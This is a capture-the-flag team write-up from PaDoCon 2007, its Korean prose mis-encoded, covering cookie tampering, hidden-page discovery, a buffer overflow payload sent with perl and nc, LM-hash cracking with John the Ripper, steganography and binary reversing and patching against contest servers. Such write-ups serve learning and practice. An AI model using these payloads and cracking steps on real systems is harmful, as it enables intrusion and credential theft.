PAraDox COnfereNce 2007 Capture The Flag
----------------------------------------
wow38317 team report
--------------------

-
	ȸ  Ȥ     Ǯ̼ Դϴ.
	ž ȸ ϴٺ   ص ʾƼ ڼ Ǯ̸   ̸   帳ϴ.
-





=============
Stage1, Bingo
=============

unhash )
־  ִ hash  Ǯ s3xypad0c5n ̶    ־ϴ.





Cookie )
padowave=key  Ű Ư  ġ Delete , 信 Ѿ⶧
Ű   ǳ   ٷ ûϿ Ʒ   Ͽϴ.

[hkpco@ns hkpco]$ telnet 155.230.251.100 80
Trying 155.230.251.100...
Connected to 155.230.251.100.
Escape character is '^]'.
GET http://155.230.251.100/~q4/mong/kite815/result.php HTTP/1.0
Cookie: padowave=key

HTTP/1.1 200 OK
Date: Fri, 19 Jan 2007 04:30:08 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Accept-Ranges: bytes
X-Powered-By: PHP/4.2.2
Content-Length: 73
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<img src='pado.jpg'><br><br>Bravo! н 'padowaveshocking' Դϴ.
Connection closed by foreign host.





Ajax )
ش  source-view  ڹٽũƮ  Ͽ  ּҸ   ־ϴ.

[hkpco@ns public_html]$ telnet 155.230.251.17 80
Trying 155.230.251.17...
Connected to 155.230.251.17.
Escape character is '^]'.
GET http://155.230.251.17/~hack2/sorry.php HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 19 Jan 2007 17:41:16 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Content-Length: 185
Connection: close
Content-Type: text/html; charset=euckr

<html>
        <script type='text/javascript' src='./aj.js'></script>
        <script type='text/javascript' src='./req.js'></script>
        <body onload=stupid()>
        <div id=ps></div>
        </body>
</html>Connection closed by foreign host.
[hkpco@ns public_html]$


- req.js -
.
.
.
			el.innerHTML = seg;
		}
	}
	url = './wanted.php'; <-  
	req.open('GET', url, true);
	req.send('');
.
.
.
- end -

http://155.230.251.17/~hack2/wanted.php
passwd : yousogood





Shuffle)
 ϴٰ  ʽ  ɷȽϴ.

============================
Bonus  Դϴ.
Password : OverTheRainbow
߰  ʽ....
============================





Crack )
MyCTF_14.exe   ʰ   Ͽ ȣȭ ڿ ġ׽ϴ.
(  캸 α׷ Ģ ã  ֽϴ. )

 SeriesAndEncryption





Disassemble )
 α׷ 𽺾  ̿Ͽ  ϴ Դϴ.
calculationκ  캸    ֽϴ.
switch ̿ ԼԴϴ.

0x08048465 <calculation+0>:     push   %ebp
0x08048466 <calculation+1>:     mov    %esp,%ebp
0x08048468 <calculation+3>:     sub    $0xc,%esp
0x0804846b <calculation+6>:     mov    0x8(%ebp),%eax
0x0804846e <calculation+9>:     mov    %al,0xffffffff(%ebp)
0x08048471 <calculation+12>:    movsbl 0xffffffff(%ebp),%eax
0x08048475 <calculation+16>:    sub    $0x43,%eax
0x08048478 <calculation+19>:    mov    %eax,0xfffffff4(%ebp)
0x0804847b <calculation+22>:    cmpl   $0x2f,0xfffffff4(%ebp)
0x0804847f <calculation+26>:    ja     0x80484d5 <calculation+112>
0x08048481 <calculation+28>:    mov    0xfffffff4(%ebp),%edx
0x08048484 <calculation+31>:    mov    0x80485ec(,%edx,4),%eax
0x0804848b <calculation+38>:    jmp    *%eax
0x0804848d <calculation+40>:    movl   $0x4d,0xfffffff8(%ebp)
0x08048494 <calculation+47>:    jmp    0x80484dc <calculation+119>
0x08048496 <calculation+49>:    movl   $0x69,0xfffffff8(%ebp)
0x0804849d <calculation+56>:    jmp    0x80484dc <calculation+119>
0x0804849f <calculation+58>:    movl   $0x6c,0xfffffff8(%ebp)
0x080484a6 <calculation+65>:    jmp    0x80484dc <calculation+119>
0x080484a8 <calculation+67>:    movl   $0x6b,0xfffffff8(%ebp)
0x080484af <calculation+74>:    jmp    0x80484dc <calculation+119>
0x080484b1 <calculation+76>:    movl   $0x79,0xfffffff8(%ebp)
0x080484b8 <calculation+83>:    jmp    0x80484dc <calculation+119>
0x080484ba <calculation+85>:    movl   $0x77,0xfffffff8(%ebp)
0x080484c1 <calculation+92>:    jmp    0x80484dc <calculation+119>
0x080484c3 <calculation+94>:    movl   $0x61,0xfffffff8(%ebp)
0x080484ca <calculation+101>:   jmp    0x80484dc <calculation+119>
0x080484cc <calculation+103>:   movl   $0x79,0xfffffff8(%ebp)
0x080484d3 <calculation+110>:   jmp    0x80484dc <calculation+119>
0x080484d5 <calculation+112>:   movl   $0x2a,0xfffffff8(%ebp)
0x080484dc <calculation+119>:   mov    0xfffffff8(%ebp),%eax
0x080484df <calculation+122>:   leave
0x080484e0 <calculation+123>:   ret

߿ κи Ÿ 

switch( value )
{
	case 'C':
		return 'M';

	case 'l':
		return 'i';

	case 'e':
		return 'l';

	case 'a':
		return 'k';

	case 'r':
		return 'y';

	case 'L':
		return 'w';

	case 'i':
		return 'a';

	case 'n':
		return 'y';

	default:
		return '*';
}

׷Ƿ , Milkyway





BufferOverFlow )
! ڸ ̿Ͽ ּҰ   BOF ̿Ͽ ִ bufferּҸ ϵ Ͽϴ.

[hkpco@ns hkpco]$ (perl -e 'print "\x21"x12,"\xe0\xa2\x04\x08"') | nc 155.230.251.17 5553

################ <Address Information> #################

&ReadBuffer:            0xfee7a820
&KeywordAddress:        0x804a2e0
&printPtr:              0xfee7a414
*printPtr:              0xfee7a420
&start resultBuffer:    0xfee7a420
&end resultBuffer:      0xfee7a420

<HinT: !!!>
########################################################

Solution>
################ <Address Information> #################

&ReadBuffer:            0xfee7a820
&KeywordAddress:        0x804a2e0
&printPtr:              0xfee7a414
*printPtr:              0x804a2e0
&start resultBuffer:    0xfee7a420
&end resultBuffer:      0xfee7a418

<HinT: !!!>
########################################################

ResultPrint>Congretuation!!
NextPassword: aWorldWhereAnythingIsPossible





Sensitive )
簢 ׸   簢 4 ̴ 簢 4 ֽϴ.
̴ 簢  簢  ߾մϴ.
ߴ  Cookie base64 ڵ Ų  4    ٽ  2  ش 簢 x,yǥ ˴ϴ.
˾ ̿Ͽ ǥ ˾   base64 ڵϿ    ϰ    ־ϴ.

[hkpco@ns ctf2007]$ GET http://155.230.251.91/~fortune/ABD70838C9D85E38B6191870B40F21C0.php HTTP/1.0
Referer: http://155.230.251.91/~fortune/hardcore1.php
Host: 155.230.251.91
Cookie: SESSIONID=MjUzZTc5MjIxOThhOUM4MQ==


Congratulations! Authentication Code: Ker@ber@$





Steganography )
 ִ escapeڿ ٲپ ָ ڹٽũƮ ҽ ִµ  ҽ #P%A!D@O$R$I!D%A  Ű   ֽϴ.
Ű ̿Ͽ S-TOOL̶ װ׷ α׷  ߽ϴ.

            [[[[[[[[մϴ.]]]]]]]]]]]
 ----------------------------------------------------
|                   н                     |
 ----------------------------------------------------
| Truth will win out in the long run.                |
 ----------------------------------------------------





ȣȭĢ )
: http://155.230.251.77/~kertAdmin/garam5th

Guest α Ͽ  йȣ ȣȭϿ Ÿϴ.
 ڵ ε ѵ ڿ ٲ𶧸 Ű ٲϴ.
Admin2007 ԽŰ  ʿ ڿ ڵ  Ͽ  ϴ.
, EoRkfwhgdmsQksWb29724791





Ϲġȯȣ )
  ִ  ڵ  󵵿 Ϲ ĺ  󵵸 ϴ Դϴ.
ϳ  Ͽ  س  ߽ϴ.
, alien





ȭ )
ȭ  ش Wav   ļ м غ

ļ , , Ϸ    ְ
ļ , , Ϸ    ֽϴ.

Cooledit ؼ ش Wav  м ϸ       ְ
̰ Ʒ ȭ ư ļ 뿪 ϸ ش ư     մϴ.
׸ ش ư  ĺ ãƼ 񱳸 غ ˴ϴ.

, hackingandsecurity





crack )
lastSAMϳ /etc/shadowϰ  Ͽϴ.
john the ripper ̿Ͽ  ߽ϴ.

[hkpco@ns run]$ cat ct
padocon:1006:3A2031B32E4880E0AAD3B435B51404EE:C75B184F1A53D557945F640A370AE3F8:::
[hkpco@ns run]$ ./john -show ct
padocon:OKAY:1006:C75B184F1A53D557945F640A370AE3F8:::

1 password cracked, 0 left

, okay







======
Stage2
======

ù° )

LEA ESI,DWORD PTR DS:[EDX-2]
MOV EDI,ESI
IMUL EDI,ESI
LEA ESI,DWORD PTR DS:[EDI*4-10]	 
TEST ESI,ESI
.
.
LEA EBX,DWORD PTR DS:[EDX*4]
MOV EDI,DWORD PTR DS:[ECX+4E4]
LEA ESI,DWORD PTR DS:[EBX-3]
IMUL ESI,EDX
CMP EDI,ESI
.
.
MOV ESI,DWORD PTR DS:[ECX+4EC]
LEA EDX,DWORD PTR DS:[EDX+EDX*4]
SUB EDX,EDI
ADD EDX,2B
CMP ESI,EDX

a-b-c-d  ø ִٰ ϰ, b,c,dκ ƾ  ش opcode ؼϸ ø   ֽϴ.
( a κ   κԴϴ. )
 ø 777-52-4-11 ̸, α׷ Էϸ johnsonsbaby  ɴϴ.





ι° )

: http://155.230.251.100/~q2/vani/
ҽ⸦ غ,

<html>
	<script type='text/javascript' src='./aj.js'></script>
	<script type='text/javascript' src='./xhttpreq.js'></script>
	<body onload=Kronos()>
	 ޿   .<br>
		   ƴٴ    ӿ Դ.<br><br>
		ӿ ǵ ȵ γ ǳ  ַַ ĳ ʹ Ҹ ȭӰ Ѵ.<br>
		  鼭   ʴ  帮,  鸮  Ҹ  δ.<br><br>
		Ҹ      ִٴ  , ħ  Ҹ ٿ ߰ߴ.<br>
		ű⿣, 12 絵   6  ѳ ־.  ѹ..ѹ.. <br><br>
		 𰡿 Ȧ   絵 ϴ ൿ Ѻ   ۿ , ġ    .. ƴ, Ҵ Ű澲   絵 ð °͵  ä   ɵҴ.<br>
		 п   絵 Ѻ , Դ    ִµ.. Ȧغ .
		׷ ޿  ð  ݳ ְ,  絵 ι ٽ  ޼  ʾҴ.<br><br>
		  ﳪ  絵 ߾ϸ..<br>
			<br>
	!!No DoS please~!!
	<!--
	<div id='here'></div>
	-->
	</body>
</html>

ڹٽũƮ Ͽ ִ  ãϴ.

- xhttpreq.js -
.
.
.
	url = './ace.php';
	req.open('GET', url, true);
	req.send('');
.
.
.
- end -

ace.php  ̿Ͽ    ֽϴ.

[hkpco@ns ctf2007]$ telnet 155.230.251.100 80
Trying 155.230.251.100...
Connected to 155.230.251.100.
Escape character is '^]'.
GET http://155.230.251.100/~q2/vani/ace.php.bak HTTP/1.0
.
.
.
.........t1m3_By_K3R7
.
.
.

 t1m3_By_K3R7





° )

:
 ưż ٽ  Ǫʽÿ.
Ư 3 Ǯ  ϸ  ɴϴ.

  ζ  ִ   ܾ Ͽ մϴ.





׹° )

:
 ʿ Դϴ.
ctf.padocon@gmail.com  ֽø
 ص帮ڽϴ.

 index.html wget ޾Ƽ xxd ̿Ͽ 캾ϴ.
 ELFΰ   Ǵ°   ֽϴ.

gdb ̿Ͽ    ,

[hkpco@ns ctf2007]$ gdb -q index.html
(gdb) disassemble main
Dump of assembler code for function main:
0x08048784 <main+0>:    push   %ebp
0x08048785 <main+1>:    mov    %esp,%ebp
0x08048787 <main+3>:    sub    $0x48,%esp
0x0804878a <main+6>:    and    $0xfffffff0,%esp
0x0804878d <main+9>:    mov    $0x0,%eax
0x08048792 <main+14>:   sub    %eax,%esp
0x08048794 <main+16>:   sub    $0x4,%esp
0x08048797 <main+19>:   push   $0x0
0x08048799 <main+21>:   push   $0x1
0x0804879b <main+23>:   push   $0x2
.
.
.
0x08048891 <main+269>:  push   $0x8048fc5
0x08048896 <main+274>:  call   0x8048624 <printf>
0x0804889b <main+279>:  add    $0x10,%esp
0x0804889e <main+282>:  jmp    0x804885e <main+218>
0x080488a0 <main+284>:  call   0x80488bd <recive>
0x080488a5 <main+289>:  sub    $0xc,%esp
0x080488a8 <main+292>:  pushl  0x804a3b0
0x080488ae <main+298>:  call   0x8048594 <close>
0x080488b3 <main+303>:  add    $0x10,%esp
0x080488b6 <main+306>:  jmp    0x804885e <main+218>
0x080488b8 <main+308>:  mov    0xffffffc0(%ebp),%eax
0x080488bb <main+311>:  leave
0x080488bc <main+312>:  ret
End of assembler dump.

recive  Լ Դϴ.

(gdb) disassemble recive
Dump of assembler code for function recive:
0x080488bd <recive+0>:  push   %ebp
0x080488be <recive+1>:  mov    %esp,%ebp
0x080488c0 <recive+3>:  sub    $0xc18,%esp
0x080488c6 <recive+9>:  movl   $0x0,0xfffff404(%ebp)
0x080488d0 <recive+19>: movl   $0x0,0xfffff3fc(%ebp)
0x080488da <recive+29>: mov    0x4(%ebp),%eax
0x080488dd <recive+32>: mov    %eax,0xfffff3f8(%ebp)
0x080488e3 <recive+38>: push   $0x0
0x080488e5 <recive+40>: push   $0x3e8
0x080488ea <recive+45>: lea    0xfffff408(%ebp),%eax
0x080488f0 <recive+51>: push   %eax
0x080488f1 <recive+52>: pushl  0x804a3b0
0x080488f7 <recive+58>: call   0x80486a4 <recv>
0x080488fc <recive+63>: add    $0x10,%esp
.
.
.
0x080489bc <recive+255>:        mov    %eax,0xfffff3f4(%ebp)
0x080489c2 <recive+261>:        mov    0xfffff3f8(%ebp),%eax
0x080489c8 <recive+267>:        cmp    0xfffff3f4(%ebp),%eax
0x080489ce <recive+273>:        je     0x80489d2 <recive+277>
0x080489d0 <recive+275>:        jmp    0x80489e4 <recive+295>
0x080489d2 <recive+277>:        sub    $0xc,%esp
0x080489d5 <recive+280>:        lea    0xfffff7f8(%ebp),%eax
0x080489db <recive+286>:        push   %eax
0x080489dc <recive+287>:        call   0x80489e6 <parse>
0x080489e1 <recive+292>:        add    $0x10,%esp
0x080489e4 <recive+295>:        leave
0x080489e5 <recive+296>:        ret
End of assembler dump.

parse  Լ Դϴ.

(gdb) disassemble parse
Dump of assembler code for function parse:
0x080489e6 <parse+0>:   push   %ebp
0x080489e7 <parse+1>:   mov    %esp,%ebp
0x080489e9 <parse+3>:   sub    $0x17e8,%esp
0x080489ef <parse+9>:   movl   $0x0,0xfffffbf4(%ebp)
0x080489f9 <parse+19>:  movl   $0x0,0xffffe854(%ebp)
0x08048a03 <parse+29>:  movl   $0x0,0xffffe84c(%ebp)
0x08048a0d <parse+39>:  sub    $0xc,%esp
0x08048a10 <parse+42>:  pushl  0x8(%ebp)
0x08048a13 <parse+45>:  call   0x80485f4 <strlen>
0x08048a18 <parse+50>:  add    $0x10,%esp
0x08048a1b <parse+53>:  cmp    %eax,0xffffe84c(%ebp)
0x08048a21 <parse+59>:  jb     0x8048a28 <parse+66>
0x08048a23 <parse+61>:  jmp    0x8048c99 <parse+691>
0x08048a28 <parse+66>:  mov    0xffffe84c(%ebp),%eax
.
.
.
0x08048dfd <parse+1047>:        push   $0x1388
0x08048e02 <parse+1052>:        lea    0xffffe858(%ebp),%eax
0x08048e08 <parse+1058>:        push   %eax
0x08048e09 <parse+1059>:        pushl  0x804a3b0
0x08048e0f <parse+1065>:        call   0x8048674 <send>
0x08048e14 <parse+1070>:        add    $0x10,%esp
0x08048e17 <parse+1073>:        leave
0x08048e18 <parse+1074>:        ret
End of assembler dump.
(gdb)

û ϴ. Ƹ  û м/óϴ κ ϴ.
  Լ Ǿ ڽϴ.

(gdb) info func
All defined functions:

Non-debugging symbols:
0x0804854c  _init
0x08048574  localtime
0x08048584  strcmp
0x08048594  close
0x080485a4  accept
0x080485b4  listen
0x080485c4  strftime
0x080485d4  time
0x080485e4  fgets
0x080485f4  strlen
0x08048604  __libc_start_main
0x08048614  strcat
0x08048624  printf
0x08048634  bind
0x08048644  fclose
0x08048654  exit
0x08048664  sscanf
0x08048674  send
0x08048684  htons
0x08048694  fopen
0x080486a4  recv
0x080486b4  sprintf
0x080486c4  socket
0x080486f8  call_gmon_start
0x0804871c  __do_global_dtors_aux
0x08048758  frame_dummy
0x08048784  main
0x080488bd  recive
0x080489e6  parse
0x08048e19  target
0x08048edc  __libc_csu_init
0x08048f0c  __libc_csu_fini
0x08048f40  __do_global_ctors_aux
0x08048f64  _fini

target̶ Լ ֽϴ.

(gdb) disassemble target
Dump of assembler code for function target:
0x08048e19 <target+0>:  push   %ebp
0x08048e1a <target+1>:  mov    %esp,%ebp
0x08048e1c <target+3>:  sub    $0x298,%esp
0x08048e22 <target+9>:  sub    $0x8,%esp
0x08048e25 <target+12>: push   $0x80491e2
0x08048e2a <target+17>: push   $0x80491e4
0x08048e2f <target+22>: call   0x8048694 <fopen>
0x08048e34 <target+27>: add    $0x10,%esp
0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)
0x08048e3a <target+33>: sub    $0x4,%esp
0x08048e3d <target+36>: pushl  0xfffffff4(%ebp)
0x08048e40 <target+39>: push   $0x64
0x08048e42 <target+41>: lea    0xffffff78(%ebp),%eax
0x08048e48 <target+47>: push   %eax
0x08048e49 <target+48>: call   0x80485e4 <fgets>
0x08048e4e <target+53>: add    $0x10,%esp
0x08048e51 <target+56>: sub    $0xc,%esp
0x08048e54 <target+59>: pushl  0xfffffff4(%ebp)
0x08048e57 <target+62>: call   0x8048644 <fclose>
0x08048e5c <target+67>: add    $0x10,%esp
0x08048e5f <target+70>: lea    0xffffff78(%ebp),%eax
0x08048e65 <target+76>: push   %eax
0x08048e66 <target+77>: lea    0xffffff78(%ebp),%eax
0x08048e6c <target+83>: sub    $0x8,%esp
0x08048e6f <target+86>: push   %eax
0x08048e70 <target+87>: call   0x80485f4 <strlen>
0x08048e75 <target+92>: add    $0xc,%esp
0x08048e78 <target+95>: push   %eax
0x08048e79 <target+96>: push   $0x8049200
0x08048e7e <target+101>:        lea    0xfffffd78(%ebp),%eax
0x08048e84 <target+107>:        push   %eax
0x08048e85 <target+108>:        call   0x80486b4 <sprintf>
0x08048e8a <target+113>:        add    $0x10,%esp
0x08048e8d <target+116>:        push   $0x0
0x08048e8f <target+118>:        push   $0x1f4
0x08048e94 <target+123>:        lea    0xfffffd78(%ebp),%eax
0x08048e9a <target+129>:        push   %eax
0x08048e9b <target+130>:        pushl  0x804a3b0
0x08048ea1 <target+136>:        call   0x8048674 <send>
0x08048ea6 <target+141>:        add    $0x10,%esp
0x08048ea9 <target+144>:        mov    %eax,0xfffffd74(%ebp)
0x08048eaf <target+150>:        sub    $0xc,%esp
0x08048eb2 <target+153>:        pushl  0x804a3b0
0x08048eb8 <target+159>:        call   0x8048594 <close>
0x08048ebd <target+164>:        add    $0x10,%esp
0x08048ec0 <target+167>:        sub    $0xc,%esp
0x08048ec3 <target+170>:        pushl  0x804a3ac
0x08048ec9 <target+176>:        call   0x8048594 <close>
0x08048ece <target+181>:        add    $0x10,%esp
0x08048ed1 <target+184>:        sub    $0xc,%esp
0x08048ed4 <target+187>:        push   $0x0
0x08048ed6 <target+189>:        call   0x8048654 <exit>
0x08048edb <target+194>:        nop
End of assembler dump.

Ƹ  ִ   ȣ ѷִ κ ϴ.

0x08048e25 <target+12>: push   $0x80491e2
0x08048e2a <target+17>: push   $0x80491e4
0x08048e2f <target+22>: call   0x8048694 <fopen>
0x08048e34 <target+27>: add    $0x10,%esp
0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)

   ڽϴ.

(gdb) x/s 0x80491e2
0x80491e2 <_IO_stdin_used+606>:  "r"
(gdb) x/s 0x80491e4
0x80491e4 <_IO_stdin_used+608>:  "passwd"
(gdb)

fp = fopen( "passwd" , "r" );

passwd ϴ.

0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)
0x08048e3a <target+33>: sub    $0x4,%esp
0x08048e3d <target+36>: pushl  0xfffffff4(%ebp)
0x08048e40 <target+39>: push   $0x64
0x08048e42 <target+41>: lea    0xffffff78(%ebp),%eax
0x08048e48 <target+47>: push   %eax
0x08048e49 <target+48>: call   0x80485e4 <fgets>
0x08048e4e <target+53>: add    $0x10,%esp

fgets( buffer , 100(0x64) , fp );

fgets ̿Ͽ   buffer оԴϴ.

0x08048e51 <target+56>: sub    $0xc,%esp
0x08048e54 <target+59>: pushl  0xfffffff4(%ebp)
0x08048e57 <target+62>: call   0x8048644 <fclose>
0x08048e5c <target+67>: add    $0x10,%esp

fclose(fp);

 ũ͸ ݽϴ.

0x08048e5f <target+70>: lea    0xffffff78(%ebp),%eax
0x08048e65 <target+76>: push   %eax
0x08048e66 <target+77>: lea    0xffffff78(%ebp),%eax
0x08048e6c <target+83>: sub    $0x8,%esp
0x08048e6f <target+86>: push   %eax
0x08048e70 <target+87>: call   0x80485f4 <strlen>
0x08048e75 <target+92>: add    $0xc,%esp
0x08048e78 <target+95>: push   %eax
0x08048e79 <target+96>: push   $0x8049200
0x08048e7e <target+101>:        lea    0xfffffd78(%ebp),%eax
0x08048e84 <target+107>:        push   %eax
0x08048e85 <target+108>:        call   0x80486b4 <sprintf>
0x08048e8a <target+113>:        add    $0x10,%esp

(gdb) x/s 0x8049200
0x8049200 <_IO_stdin_used+636>:  "HTTP/1.1 200 OK\nContent-Length: %d\nContetnt-Type: text/html; charset=iso-8859-1\n\n%s"

sprintf( buffer , "HTTP/1.1 200 OK\nContent-Length: %d\nContetnt-Type: text/html; charset=iso-8859-1\n\n%s" , strlen(buffer) , buffer );

buffer ۵ û ϴ.

0x08048e8d <target+116>:        push   $0x0
0x08048e8f <target+118>:        push   $0x1f4
0x08048e94 <target+123>:        lea    0xfffffd78(%ebp),%eax
0x08048e9a <target+129>:        push   %eax
0x08048e9b <target+130>:        pushl  0x804a3b0
0x08048ea1 <target+136>:        call   0x8048674 <send>
0x08048ea6 <target+141>:        add    $0x10,%esp

send( client , buffer , 500(0x1f4) , 0 );

socket Ŭ̾Ʈ ݴϴ.

0x08048ea9 <target+144>:        mov    %eax,0xfffffd74(%ebp)
0x08048eaf <target+150>:        sub    $0xc,%esp
0x08048eb2 <target+153>:        pushl  0x804a3b0
0x08048eb8 <target+159>:        call   0x8048594 <close>
0x08048ebd <target+164>:        add    $0x10,%esp

close( client );

 ڸ ݽϴ.

0x08048ec0 <target+167>:        sub    $0xc,%esp
0x08048ec3 <target+170>:        pushl  0x804a3ac
0x08048ec9 <target+176>:        call   0x8048594 <close>
0x08048ece <target+181>:        add    $0x10,%esp

close( sockfd );

 ڸ ݽϴ.

0x08048ed1 <target+184>:        sub    $0xc,%esp
0x08048ed4 <target+187>:        push   $0x0
0x08048ed6 <target+189>:        call   0x8048654 <exit>

exit(0);

մϴ.

⼭ fopenκи  Ƶ  ִ  "passwd"    ֽϴ.
passwd ûغ    ֽϴ.

http://155.230.251.100/~q3/hyungee/koziro4/passwd
, password is Exelsior&Rgent





 )

result.exe ollydbg мϷ   run ϴ α׷ ˴ϴ.
Ƹ ο   ƾ ִ° ϴ.
̺κ    ֱ   ѱ  ־ϴ.
ó breakpoint ɰ    ϴ.

004015C3 |. E8 F83B0000 CALL result.004051C0  бⰡ   ˴ϴ.
call   ٽ  ̴ϴ.(    )

004051CB |. E8 70000000 CALL result.00405240 ; \result.00405240
⼭ ٽ б   մϴ.

00405240 ּҷ     õõ 캸  ؿ ExitProccess ֽϴ.
 üũ   üũ  ExitProccess ̿Ͽ ŵϴ.
 κ NOP ä ġմϴ.
̷μ   ƾ ȭ ų  ֽϴ.

α׷ 캸 Ʈ ؾ ϴ  ϴ.
Ʈ  ʰ Ǯڽϴ.

0040BC79 74 1C JE SHORT resultx.0040BC97 
0040BC7B |. 68 78004200 PUSH resultx.00420078 ; /Arg2 = 00420078 ASCII "sorry : This problem is not solved. Try again :( " 

̺κ   üũ ̷  ڿ ġ  ϴ° Դϴ.
б JNZ   Ѿϴ.

0040BCDD 74 1C JE SHORT resultx.0040BCFB
0040BCDF |. 68 78004200 PUSH resultx.00420078 ; /Arg2 = 00420078 ASCII "sorry : This problem is not solved. Try again :( "

Ʊ  Դϴ.
JNZ   Ѿϴ.

̷ üũ ǽɵǴ κ б    Ű    ֽϴ.
, C*dafd*hcdcyb*0#